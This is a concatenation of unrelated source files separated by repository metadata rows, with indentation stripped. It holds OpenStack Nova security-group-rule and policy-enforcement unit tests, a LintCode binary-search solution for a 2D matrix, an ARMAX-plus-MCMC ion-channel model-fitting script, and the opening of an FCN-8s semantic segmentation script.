req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_to_port(self):
rule = security_group_rule_template(to_port='666666',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_numerical_from_port(self):
rule = security_group_rule_template(from_port='invalid',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_numerical_to_port(self):
rule = security_group_rule_template(to_port='invalid',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_from_port(self):
rule = security_group_rule_template(cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
del rule['from_port']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_to_port(self):
rule = security_group_rule_template(cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
del rule['to_port']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_cidr(self):
rule = security_group_rule_template(cidr='10.2.2222.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_cidr_group(self):
rule = security_group_rule_template(parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"0.0.0.0/0")
def test_create_with_invalid_group_id(self):
rule = security_group_rule_template(group_id='invalid',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_empty_group_id(self):
rule = security_group_rule_template(group_id='',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_nonexist_group_id(self):
rule = security_group_rule_template(group_id=self.invalid_id,
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_same_group_parent_id_and_group_id(self):
rule = security_group_rule_template(group_id=self.sg1['id'],
parent_group_id=self.sg1['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.sg1['id'])
self.assertEqual(security_group_rule['group']['name'],
self.sg1['name'])
def _test_create_with_no_ports_and_no_group(self, proto):
rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def _test_create_with_no_ports(self, proto):
rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id'],
'group_id': self.sg1['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
expected_rule = {
'from_port': 1, 'group': {'tenant_id': '123', 'name': 'test'},
'ip_protocol': proto, 'to_port': 65535, 'parent_group_id':
self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
}
if proto == 'icmp':
expected_rule['to_port'] = -1
expected_rule['from_port'] = -1
self.assertEqual(expected_rule, security_group_rule)
def test_create_with_no_ports_icmp(self):
self._test_create_with_no_ports_and_no_group('icmp')
self._test_create_with_no_ports('icmp')
def test_create_with_no_ports_tcp(self):
self._test_create_with_no_ports_and_no_group('tcp')
self._test_create_with_no_ports('tcp')
def test_create_with_no_ports_udp(self):
self._test_create_with_no_ports_and_no_group('udp')
self._test_create_with_no_ports('udp')
def _test_create_with_ports(self, proto, from_port, to_port):
rule = {
'ip_protocol': proto, 'from_port': from_port, 'to_port': to_port,
'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
expected_rule = {
'from_port': from_port,
'group': {'tenant_id': '123', 'name': 'test'},
'ip_protocol': proto, 'to_port': to_port, 'parent_group_id':
self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
}
self.assertEqual(proto, security_group_rule['ip_protocol'])
self.assertEqual(from_port, security_group_rule['from_port'])
self.assertEqual(to_port, security_group_rule['to_port'])
self.assertEqual(expected_rule, security_group_rule)
def test_create_with_ports_icmp(self):
self._test_create_with_ports('icmp', 0, 1)
self._test_create_with_ports('icmp', 0, 0)
self._test_create_with_ports('icmp', 1, 0)
def test_create_with_ports_tcp(self):
self._test_create_with_ports('tcp', 1, 1)
self._test_create_with_ports('tcp', 1, 65535)
self._test_create_with_ports('tcp', 65535, 65535)
def test_create_with_ports_udp(self):
self._test_create_with_ports('udp', 1, 1)
self._test_create_with_ports('udp', 1, 65535)
self._test_create_with_ports('udp', 65535, 65535)
def test_delete(self):
rule = security_group_rule_template(id=self.sg2['id'],
parent_group_id=self.sg2['id'])
def security_group_rule_get(context, id):
return security_group_rule_db(rule)
def security_group_rule_destroy(context, id):
pass
self.stubs.Set(nova.db, 'security_group_rule_get',
security_group_rule_get)
self.stubs.Set(nova.db, 'security_group_rule_destroy',
security_group_rule_destroy)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
% self.sg2['id'])
self.controller.delete(req, self.sg2['id'])
def test_delete_invalid_rule_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules' +
'/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_delete_non_existing_rule_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
% self.invalid_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.invalid_id)
def test_create_rule_quota_limit(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
for num in range(100, 100 + CONF.quota_security_group_rules):
rule = {
'ip_protocol': 'tcp', 'from_port': num,
'to_port': num, 'parent_group_id': self.sg2['id'],
'group_id': self.sg1['id']
}
self.controller.create(req, {'security_group_rule': rule})
rule = {
'ip_protocol': 'tcp', 'from_port': '121', 'to_port': '121',
'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
}
self.assertRaises(webob.exc.HTTPForbidden, self.controller.create,
req, {'security_group_rule': rule})
def test_create_rule_cidr_allow_all(self):
rule = security_group_rule_template(cidr='0.0.0.0/0',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"0.0.0.0/0")
def test_create_rule_cidr_ipv6_allow_all(self):
rule = security_group_rule_template(cidr='::/0',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"::/0")
def test_create_rule_cidr_allow_some(self):
rule = security_group_rule_template(cidr='15.0.0.0/8',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEqual(security_group_rule['id'], 0)
self.assertEqual(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEqual(security_group_rule['ip_range']['cidr'],
"15.0.0.0/8")
def test_create_rule_cidr_bad_netmask(self):
rule = security_group_rule_template(cidr='15.0.0.0/0')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
class TestSecurityGroupRulesV2(TestSecurityGroupRulesV21):
secgrp_ctl_cls = secgroups_v2.SecurityGroupRulesController
UUID1 = '00000000-0000-0000-0000-000000000001'
UUID2 = '00000000-0000-0000-0000-000000000002'
UUID3 = '00000000-0000-0000-0000-000000000003'
def fake_compute_get_all(*args, **kwargs):
base = {'id': 1, 'description': 'foo', 'user_id': 'bar',
'project_id': 'baz', 'deleted': False, 'deleted_at': None,
'updated_at': None, 'created_at': None}
db_list = [
fakes.stub_instance(
1, uuid=UUID1,
security_groups=[dict(base, **{'name': 'fake-0-0'}),
dict(base, **{'name': 'fake-0-1'})]),
fakes.stub_instance(
2, uuid=UUID2,
security_groups=[dict(base, **{'name': 'fake-1-0'}),
dict(base, **{'name': 'fake-1-1'})])
]
return instance_obj._make_instance_list(args[1],
objects.InstanceList(),
db_list,
['metadata', 'system_metadata',
'security_groups', 'info_cache'])
def fake_compute_get(*args, **kwargs):
inst = fakes.stub_instance(1, uuid=UUID3,
security_groups=[{'name': 'fake-2-0'},
{'name': 'fake-2-1'}])
return fake_instance.fake_instance_obj(args[1],
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS, **inst)
def fake_compute_create(*args, **kwargs):
return ([fake_compute_get(*args, **kwargs)], '')
def fake_get_instances_security_groups_bindings(inst, context, servers):
groups = {UUID1: [{'name': 'fake-0-0'}, {'name': 'fake-0-1'}],
UUID2: [{'name': 'fake-1-0'}, {'name': 'fake-1-1'}],
UUID3: [{'name': 'fake-2-0'}, {'name': 'fake-2-1'}]}
result = {}
for server in servers:
result[server['id']] = groups.get(server['id'])
return result
class SecurityGroupsOutputTestV21(test.TestCase):
base_url = '/v2/fake/servers'
content_type = 'application/json'
def setUp(self):
super(SecurityGroupsOutputTestV21, self).setUp()
fakes.stub_out_nw_api(self.stubs)
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
self.stubs.Set(compute.api.API, 'get_all', fake_compute_get_all)
self.stubs.Set(compute.api.API, 'create', fake_compute_create)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Security_groups'])
self.app = self._setup_app()
def _setup_app(self):
return fakes.wsgi_app_v21(init_only=('os-security-groups', 'servers'))
def _make_request(self, url, body=None):
req = webob.Request.blank(url)
if body:
req.method = 'POST'
req.body = self._encode_body(body)
req.content_type = self.content_type
req.headers['Accept'] = self.content_type
res = req.get_response(self.app)
return res
def _encode_body(self, body):
return jsonutils.dumps(body)
def _get_server(self, body):
return jsonutils.loads(body).get('server')
def _get_servers(self, body):
return jsonutils.loads(body).get('servers')
def _get_groups(self, server):
return server.get('security_groups')
def test_create(self):
image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)
res = self._make_request(self.base_url, {'server': server})
self.assertEqual(res.status_int, 202)
server = self._get_server(res.body)
for i, group in enumerate(self._get_groups(server)):
name = 'fake-2-%s' % i
self.assertEqual(group.get('name'), name)
def test_show(self):
url = self.base_url + '/' + UUID3
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
server = self._get_server(res.body)
for i, group in enumerate(self._get_groups(server)):
name = 'fake-2-%s' % i
self.assertEqual(group.get('name'), name)
def test_detail(self):
url = self.base_url + '/detail'
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
for i, server in enumerate(self._get_servers(res.body)):
for j, group in enumerate(self._get_groups(server)):
name = 'fake-%s-%s' % (i, j)
self.assertEqual(group.get('name'), name)
def test_no_instance_passthrough_404(self):
def fake_compute_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
url = self.base_url + '/70f6db34-de8d-4fbd-aafb-4065bdfa6115'
res = self._make_request(url)
self.assertEqual(res.status_int, 404)
class SecurityGroupsOutputTestV2(SecurityGroupsOutputTestV21):
def _setup_app(self):
return fakes.wsgi_app(init_only=('servers',))
class SecurityGroupsOutputPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(SecurityGroupsOutputPolicyEnforcementV21, self).setUp()
self.controller = secgroups_v21.SecurityGroupsOutputController()
self.req = fakes.HTTPRequest.blank('')
self.rule_name = "os_compute_api:os-security-groups"
self.rule = {self.rule_name: "project:non_fake"}
self.policy.set_rules(self.rule)
def test_show_policy_failed(self):
self.controller.show(self.req, None, FAKE_UUID1)
def test_create_policy_failed(self):
self.controller.create(self.req, None, {})
def test_detail_policy_failed(self):
self.controller.detail(self.req, None)
class PolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(PolicyEnforcementV21, self).setUp()
self.req = fakes.HTTPRequest.blank('')
self.rule_name = "os_compute_api:os-security-groups"
self.rule = {self.rule_name: "project:non_fake"}
def _common_policy_check(self, func, *arg, **kwarg):
self.policy.set_rules(self.rule)
exc = self.assertRaises(
exception.PolicyNotAuthorized, func, *arg, **kwarg)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
class SecurityGroupPolicyEnforcementV21(PolicyEnforcementV21):
def setUp(self):
super(SecurityGroupPolicyEnforcementV21, self).setUp()
self.controller = secgroups_v21.SecurityGroupController()
def test_create_policy_failed(self):
self._common_policy_check(self.controller.create, self.req, {})
def test_show_policy_failed(self):
self._common_policy_check(self.controller.show, self.req, FAKE_UUID1)
def test_delete_policy_failed(self):
self._common_policy_check(self.controller.delete, self.req, FAKE_UUID1)
def test_index_policy_failed(self):
self._common_policy_check(self.controller.index, self.req)
def test_update_policy_failed(self):
self._common_policy_check(
self.controller.update, self.req, FAKE_UUID1, {})
class ServerSecurityGroupPolicyEnforcementV21(PolicyEnforcementV21):
def setUp(self):
super(ServerSecurityGroupPolicyEnforcementV21, self).setUp()
self.controller = secgroups_v21.ServerSecurityGroupController()
def test_index_policy_failed(self):
self._common_policy_check(self.controller.index, self.req, FAKE_UUID1)
class SecurityGroupRulesPolicyEnforcementV21(PolicyEnforcementV21):
def setUp(self):
super(SecurityGroupRulesPolicyEnforcementV21, self).setUp()
self.controller = secgroups_v21.SecurityGroupRulesController()
def test_create_policy_failed(self):
self._common_policy_check(self.controller.create, self.req, {})
def test_delete_policy_failed(self):
self._common_policy_check(self.controller.delete, self.req, FAKE_UUID1)
class SecurityGroupActionPolicyEnforcementV21(PolicyEnforcementV21):
def setUp(self):
super(SecurityGroupActionPolicyEnforcementV21, self).setUp()
self.controller = secgroups_v21.SecurityGroupActionController()
def test_add_security_group_policy_failed(self):
self._common_policy_check(
self.controller._addSecurityGroup, self.req, FAKE_UUID1, {})
def test_remove_security_group_policy_failed(self):
self._common_policy_check(
self.controller._removeSecurityGroup, self.req, FAKE_UUID1, {})
| 43.359666 | 79 | 0.628031 |
cc6dd4cedf162e0d6045353175329f3457dc8a08 | 1,491 | py | Python | pythonAlgorithm/binarysearch/Search a 2D Matrix.py | Sky-zzt/lintcodePractice | d6436b296c5865d85e55c8ad4fcdbb0165d4ebb1 | [
"MIT"
] | 1 | 2020-09-15T07:58:55.000Z | 2020-09-15T07:58:55.000Z | pythonAlgorithm/binarysearch/Search a 2D Matrix.py | Sky-zzt/lintcodePractice | d6436b296c5865d85e55c8ad4fcdbb0165d4ebb1 | [
"MIT"
] | null | null | null | pythonAlgorithm/binarysearch/Search a 2D Matrix.py | Sky-zzt/lintcodePractice | d6436b296c5865d85e55c8ad4fcdbb0165d4ebb1 | [
"MIT"
] | null | null | null | class Solution:
"""
@param matrix: matrix, a list of lists of integers
@param target: An integer
@return: a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
m = len(matrix)
n = len(matrix[0])
start = 0
end = m - 1
while start + 1 < end:
mid = (start + end) // 2
if matrix[mid][n - 1] < target:
start = mid
elif matrix[mid][n - 1] > target:
end = mid
elif matrix[mid][n - 1] == target:
return True
if matrix[start][n - 1] >= target: # todo 是>= do not forget
return self.bs(matrix[start], target)
else:
return self.bs(matrix[end], target)
def bs(self, nums, target):
# write your code here
if not nums: return False
l = len(nums)
start = 0
# todo need to l-1 or line 35 will be wrong
end = l - 1
while start + 1 < end:
mid = (start + end) // 2
if nums[mid] == target:
return True
elif nums[mid] < target:
start = mid
elif nums[mid] > target:
end = mid
if nums[start] == target:
return True
if nums[end] == target:
return True
return False
s=Solution()
s.searchMatrix([[1,3,5,7],[10,11,16,20],[23,30,34,50]],7)
| 29.82 | 67 | 0.482897 |
19f465f23132b4202c125d076fea797f7e1d3a26 | 9,864 | py | Python | ion-channel-models/mcmc_arma.py | sanmitraghosh/fickleheart-method-tutorials | d5ee910258a2656951201d4ada2a412804013bd5 | [
"BSD-3-Clause"
] | null | null | null | ion-channel-models/mcmc_arma.py | sanmitraghosh/fickleheart-method-tutorials | d5ee910258a2656951201d4ada2a412804013bd5 | [
"BSD-3-Clause"
] | null | null | null | ion-channel-models/mcmc_arma.py | sanmitraghosh/fickleheart-method-tutorials | d5ee910258a2656951201d4ada2a412804013bd5 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
from __future__ import print_function
import sys
sys.path.append('./method')
import os
import numpy as np
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pints
import pints.io
import pints.plot
import pymc3 as pm
import statsmodels.api as sm
import random
from sklearn.externals import joblib
from statsmodels.tsa.arima_process import arma2ma
from statsmodels.tsa.tsatools import _ar_transparams, _ar_invtransparams, _ma_transparams, _ma_invtransparams
import model as m
import parametertransform
import priors
from priors import HalfNormalLogPrior, InverseGammaLogPrior, ArmaNormalCentredLogPrior, ArmaNormalLogPrior
from armax_ode_tsa_likelihood import DiscrepancyLogLikelihood
"""
Run fit.
Note for Chon: Here I am using ARMA(2,2) but we need to fit ARMA(1,2), ARMA(2,1), ARMA(1,1) as well
and compare there Deviance information criteria, which this script calculates at the end
"""
print('Using PyMC3 version: ',str(pm.__version__))
model_list = ['A', 'B', 'C']
try:
which_model = 'A'#sys.argv[1]
except:
print('Usage: python %s [str:which_model]' % os.path.basename(__file__))
sys.exit()
if which_model not in model_list:
raise ValueError('Input model %s is not available in the model list' \
% which_model)
# Get all input variables
import importlib
sys.path.append('./mmt-model-files')
info_id = 'model_%s' % which_model
info = importlib.import_module(info_id)
data_dir = './data'
savedir = './out/mcmc-' + info_id
if not os.path.isdir(savedir):
os.makedirs(savedir)
data_file_name = 'data-sinewave.csv'
print('Fitting to ', data_file_name)
print('Temperature: ', info.temperature)
saveas = info_id + '-' + data_file_name[5:][:-4]
# Protocol
protocol = np.loadtxt('./protocol-time-series/sinewave.csv', skiprows=1,
delimiter=',')
protocol_times = protocol[:, 0]
protocol = protocol[:, 1]
# Control fitting seed
# fit_seed = np.random.randint(0, 2**30)
fit_seed = 542811797
print('Fit seed: ', fit_seed)
np.random.seed(fit_seed)
# Set parameter transformation
transform_to_model_param = parametertransform.log_transform_to_model_param
transform_from_model_param = parametertransform.log_transform_from_model_param
# Load data
data = np.loadtxt(data_dir + '/' + data_file_name,
delimiter=',', skiprows=1) # headers
times = data[:, 0]
data = data[:, 1]
noise_sigma = np.log(np.std(data[:500]))
print('Estimated noise level: ', noise_sigma)
model = m.Model(info.model_file,
variables=info.parameters,
current_readout=info.current_list,
set_ion=info.ions_conc,
transform=transform_to_model_param,
temperature=273.15 + info.temperature, # K
)
LogPrior = {
'model_A': priors.ModelALogPrior,
'model_B': priors.ModelBLogPrior,
}
# Update protocol
model.set_fixed_form_voltage_protocol(protocol, protocol_times)
# Fit an armax model to get ballpark estmates of starting arma parameters
# I have hard-coded to an ARMA(2,2) model, maybe worth using user iputs
transparams = False ################# <-----Changed 21/10 #####################
debug = True
if not debug:
print('Fitting an ARMAX (', str(2),',',str(2),') model')
cmaes_params = np.copy(np.log(info.base_param))
exog_current = model.simulate(cmaes_params, times)#[:,None]
armax_mod = sm.tsa.ARMA(data, order=(2,2), exog=exog_current)
armax_result = armax_mod.fit(trend='nc', transparams= True, solver='cg')
n_arama = len(armax_result.params[armax_result.k_exog:])
print(armax_result.summary())
joblib.dump(armax_result, './out/armax.pkl', compress=3)
else:
cmaes_params = np.copy(np.log(info.base_param))
exog_current = model.simulate(cmaes_params, times)[:,None]
armax_result = joblib.load('./out/armax.pkl')
n_arama = len(armax_result.params[armax_result.k_exog:])
# Create Pints stuffs
problem = pints.SingleOutputProblem(model, times, data)
loglikelihood = DiscrepancyLogLikelihood(problem, armax_result, transparams=transparams) ################# <-----Changed 21/10 #####################
logmodelprior = LogPrior[info_id](transform_to_model_param,
transform_from_model_param)
# Priors for discrepancy
logarmaprior = ArmaNormalCentredLogPrior(armax_result, 0.25) # Note for Chon: Worth checking out more wider/narrower priors
logprior = pints.ComposedLogPrior(logmodelprior, logarmaprior)
logposterior = pints.LogPosterior(loglikelihood, logprior)
# Check logposterior is working fine
init_arma_ar = _ar_transparams(armax_result.arparams.copy()) ################# <-----Changed 21/10 #####################
init_arma_ma = _ma_transparams(armax_result.maparams.copy()) ################# <-----Changed 21/10 #####################
init_arma = np.append(init_arma_ar, init_arma_ma) ################# <-----Changed 21/10 #####################
priorparams = np.copy(info.base_param)
transform_priorparams = transform_from_model_param(priorparams)
priorparams = np.append(priorparams, init_arma)
transform_priorparams = np.append(transform_priorparams, init_arma)
print('Posterior at prior parameters: ',
logposterior(transform_priorparams))
for _ in range(10):
assert(logposterior(transform_priorparams) ==\
logposterior(transform_priorparams))
# Load fitting results
calloaddir = './out/' + info_id
load_seed = 542811797
fit_idx = [1, 2, 3]
transform_x0_list = []
print('MCMC starting point: ')
for i in fit_idx:
f = '%s/%s-solution-%s-%s.txt' % (calloaddir, 'sinewave', load_seed, i)
p = np.loadtxt(f)
transform_x0_list.append(np.append(transform_from_model_param(p),
init_arma))
print(transform_x0_list[-1])
print('Posterior: ', logposterior(transform_x0_list[-1]))
# Run
mcmc = pints.MCMCController(logposterior, len(transform_x0_list),
transform_x0_list, method=pints.AdaptiveCovarianceMCMC)
n_iter = 1000 # Need higher iterations in my experience
mcmc.set_max_iterations(n_iter)
mcmc.set_initial_phase_iterations(int(200)) # Note for Chon: Only use 100/200 iterations maximum for random walk and then switch to Adaptive
mcmc.set_parallel(False)
mcmc.set_chain_filename('%s/%s-chain.csv' % (savedir, saveas))
mcmc.set_log_pdf_filename('%s/%s-pdf.csv' % (savedir, saveas))
chains = mcmc.run()
# De-transform parameters
chains_param = np.zeros(chains.shape)
for i, c in enumerate(chains):
c_tmp = np.copy(c)
chains_param[i, :, :-n_arama] = transform_to_model_param(c_tmp[:, :-n_arama]) # First the model ones
chains_param[i, :, -n_arama:] = c_tmp[:, -n_arama:] # Then the discrepancy ones
del(c_tmp)
# Save (de-transformed version)
pints.io.save_samples('%s/%s-chain.csv' % (savedir, saveas), *chains_param)
# Plot
# burn in and thinning
chains_final = chains[:, int(0.5 * n_iter)::1, :]
chains_param = chains_param[:, int(0.5 * n_iter)::1, :]
transform_x0 = transform_x0_list[0]
x0 = np.append(transform_to_model_param(transform_x0[:-n_arama]), transform_x0[-n_arama:])
pints.plot.pairwise(chains_param[0], kde=False, ref_parameters=x0)
plt.savefig('%s/%s-fig1.png' % (savedir, saveas))
plt.close('all')
pints.plot.trace(chains_param, ref_parameters=x0)
plt.savefig('%s/%s-fig2.png' % (savedir, saveas))
plt.close('all')
# Bayesian prediction of ARMAX Based on the variance identity
# That is let say that theta = (ode_params,arma_params) and p(theta|data) is the posterior
# We want to evaluate the posterior predictive: E|armax_forecast|data|, Var|armax_forecast|data|,
# all expectation w.r.t p(theta|data). This can be done with the variance identitiy trick
ppc_samples = chains_param[0]
armax_mean =[]
armax_sd = []
pdic = []
for ind in random.sample(range(0, np.size(ppc_samples, axis=0)), 400):
ode_params = transform_from_model_param(ppc_samples[ind, :-n_arama])
ode_sol = model.simulate(ode_params, times)
armax_params = np.append(1.0,ppc_samples[ind, -n_arama:])
armax_result.params = armax_params
armax_result.arparams = armax_params[armax_result.k_exog:armax_result.k_ar + armax_result.k_exog]
armax_result.maparams = armax_params[-armax_result.k_ma:]
armax_result.model.exog = exog_current
mean, sd, _ = armax_result.forecast(steps=len(times),exog=ode_sol)
armax_result.model.exog = ode_sol[:,None]
armax_result.model.transparams = transparams ################# <-----Changed 21/10 #####################
ll = armax_result.model.loglike_kalman(armax_params)
if ll is not np.inf and ll is not np.nan:
pdic.append(ll)
armax_mean.append(mean)
armax_sd.append(sd)
armax_mean = np.array(armax_mean)
armax_sd = np.array(armax_sd)
ppc_mean = np.mean(armax_mean, axis=0)
var1, var2, var3 = np.mean(armax_sd**2, axis=0), np.mean(armax_mean**2, axis=0), (np.mean(armax_mean, axis=0))**2
ppc_sd = np.sqrt(var1 + var2 - var3)
plt.figure(figsize=(8, 6))
plt.plot(times, data, label='Model C')
plt.plot(times, ppc_mean, label='Mean')
plt.plot(times, ppc_mean + 2*ppc_sd, '-', color='blue',
lw=0.5, label='conf_int')
plt.plot(times, ppc_mean - 2*ppc_sd, '-', color='blue',
lw=0.5)
plt.legend()
plt.xlabel('Time (ms)')
plt.ylabel('Current (pA)')
plt.show()
# Calculation of DIC
theta_bar = np.mean(ppc_samples,axis=0)
ode_params = transform_from_model_param(theta_bar[:-n_arama])
ode_sol = model.simulate(ode_params, times)
armax_params = np.append(1.0,theta_bar[-n_arama:])
armax_result.model.exog = ode_sol[:,None]
armax_result.model.transparams = True
pdic = np.mean(pdic)
pdic = 2.0*(armax_result.model.loglike_kalman(armax_params) - pdic)
DIC = -2.0 * armax_result.model.loglike_kalman(armax_params) + 2*pdic
print('DIC for ARMAX(2,2): ',DIC)
| 36.131868 | 148 | 0.701034 |
ec69ed5954ff64e87618e708e8d53a74a7066a44 | 13,493 | py | Python | myfcn.py | wdmwhh/FCN-8s | 8ff6a7a33e2a1d27530fb5a5d4019b0786000629 | [
"MIT"
] | 1 | 2020-06-03T09:19:03.000Z | 2020-06-03T09:19:03.000Z | myfcn.py | wdmwhh/FCN-8s | 8ff6a7a33e2a1d27530fb5a5d4019b0786000629 | [
"MIT"
] | null | null | null | myfcn.py | wdmwhh/FCN-8s | 8ff6a7a33e2a1d27530fb5a5d4019b0786000629 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Dec 1 19:55:09 2018
FCN-VGG16-8s
@author: WDMWHH
"""
from __future__ import print_function, division
from torch.optim import lr_scheduler
from torchvision import transforms, models
from torch.utils.data import Dataset, DataLoader
from PIL import Image
from scipy import ndimage
from tqdm import tqdm
import os
import time
import torch
import numpy as np
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import matplotlib.pyplot as plt
datadir = input('data directory: ') # public server
voc_root = os.path.join(datadir, 'VOC2012')
def read_images(root_dir, train):
txt_fname = root_dir + '/Segmentation/' + ('sbdtrain.txt' if train else 'seg11valid.txt')
with open(txt_fname, 'r') as f:
images = f.read().split()
data_list = [os.path.join(root_dir, 'JPEGImages', i+'.jpg') for i in images]
label_list = [os.path.join(root_dir, 'SegmentationClass', i+'.png') for i in images]
return data_list, label_list
class VOCDataset(Dataset):
""" VOC2012 Dataset. """
def __init__(self, root_dir=voc_root, train=True, trsf=None):
self.root_dir = root_dir
self.trsf = trsf
self.data_list, self.label_list = read_images(root_dir, train)
def __len__(self):
return len(self.data_list)
def __getitem__(self, idx):
image, label = self.data_list[idx], self.label_list[idx]
image, label = Image.open(image).convert('RGB'), Image.open(label)
sample = {'image': image, 'label': label}
if self.trsf:
sample = self.trsf(sample)
return sample
class ToTensor(object):
def __call__(self, sample):
image, label = sample['image'], sample['label']
image = transforms.ToTensor()(image)
label = torch.from_numpy(np.array(label, dtype='int'))
return {'image': image, 'label': label}
class Normalize(object):
def __init__(self, mean = [0., 0., 0.], std = [1., 1., 1.]):
self.mean = mean
self.std = std
def __call__(self, sample):
image, label = sample['image'], sample['label']
image = transforms.Normalize(self.mean, self.std)(image)
return {'image': image, 'label': label}
# 定义 bilinear kernel
def bilinear_kernel(in_channels, out_channels, kernel_size):
'''
return a bilinear filter tensor
'''
factor = (kernel_size + 1) // 2
if kernel_size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:kernel_size, :kernel_size]
filt = (1 - abs(og[0] - center) / factor) * (1 - abs(og[1] - center) / factor)
weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size), dtype='float32')
weight[range(in_channels), range(out_channels), :, :] = filt
